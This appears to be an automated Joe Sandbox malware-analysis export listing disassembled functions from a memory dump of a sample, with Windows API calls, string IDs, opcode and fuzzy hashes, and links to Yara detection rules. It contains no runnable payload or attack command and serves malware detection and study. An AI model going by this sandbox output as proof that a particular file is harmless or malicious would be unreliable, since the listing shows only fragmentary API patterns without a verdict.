                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                • String ID: -----$SysListView32
                                                                                                • API String ID: 4008455318-3975388722
                                                                                                • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                • GetParent.USER32 ref: 00469C98
                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                • GetParent.USER32 ref: 00469CBC
                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 2360848162-1403004172
                                                                                                • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                • String ID:
                                                                                                • API String ID: 262282135-0
                                                                                                • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$LongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 312131281-0
                                                                                                • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                • SendMessageW.USER32(769523D0,00001001,00000000,?), ref: 00448E16
                                                                                                • SendMessageW.USER32(769523D0,00001026,00000000,?), ref: 00448E25
                                                                                                  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                • String ID:
                                                                                                • API String ID: 3771399671-0
                                                                                                • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                • String ID:
                                                                                                • API String ID: 2156557900-0
                                                                                                • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                • API String ID: 0-1603158881
                                                                                                • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                Function 00401CB0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 240COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                • String ID: close all$#v
                                                                                                • API String ID: 4174999648-3101823635
                                                                                                • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateMenu.USER32 ref: 00448603
                                                                                                • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                • IsMenu.USER32(?), ref: 004486AB
                                                                                                • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                • DrawMenuBar.USER32 ref: 004486F5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                • String ID: 0
                                                                                                • API String ID: 161812096-4108050209
                                                                                                • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 978794511-0
                                                                                                • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClearVariant
                                                                                                • String ID:
                                                                                                • API String ID: 1473721057-0
                                                                                                • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
